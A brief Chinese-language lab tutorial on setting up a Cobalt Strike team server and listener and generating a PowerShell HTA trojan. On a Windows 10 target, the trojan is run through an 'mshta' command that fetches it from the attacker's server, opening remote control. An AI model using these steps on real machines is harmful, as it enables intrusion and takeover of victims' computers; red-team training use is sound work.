Cobalt Strike簡單使用教程
推薦文章:https://blog.csdn.net/weixin_44677409/article/details/102725129
CS版本:cobaltstrike_3.14_pro
服務端:kali-linux-2019.04
客戶端:kali-linux-2019.04
靶機:win10
1、在服務端安裝好CS,來到解壓后的目錄終端下,輸入命令運行團隊服務器:
./teamserver <服務端IP> <自設密碼>
2、可以看到默認連接端口為65535,打開客戶端(客戶端可多個任選),此處客戶端為linux系統,則輸入命令./cobaltstrike運行CS,如果是windows系統,雙擊cobaltstrike.bat即可。
如果遇到以下問題則輸入命令chmod a+x 給文件增加執行權限:
3、輸入開啟團隊服務器設置的IP和密碼,端口也為服務器連接端口,用戶名隨意填寫,連接成功后進行hash校驗點擊yes即可連接到團隊服務器上。
里面的一些參數和工具欄用法可以借鑒文章里的內容自己嘗試,這里只演示與靶機進行交互的步驟。
4、打開后創建監聽器,點擊Cobalt Strike -> Listeners,打開后點擊Add添加監聽器,名字隨意,選擇所需的payload,輸入服務器IP,端口選一個未被使用的任意端口輸入保存。
5、接着生成木馬,點擊Attacks->Packages->HTML Application,選擇剛剛創建的監聽器,方法此處選擇PowerShell,點擊Generate生成,選擇保存的路徑后save即生成成功。
6、然后開啟web服務,點擊Attacks->Web Drive-by->Host File,選擇剛剛生成的木馬文件,其他默認即可,點擊Launch,生成木馬下載鏈接http://<服務器IP>:80/download/file.ext。
7、打開靶機,進入控制台,使用mshta運行木馬文件:
mshta http://<服務器IP>:80/download/file.ext
8、運行成功后返回客戶端,在CS上即可看到靶機上線
9、選中靶機右擊,點擊Interact即可進行交互。
10、由於靶機默認60秒進行一次回傳,為了方便看到效果這里把時間設置成5s,輸入命令sleep 5,得等到時間到了60s才可以看到設置成功的反饋。
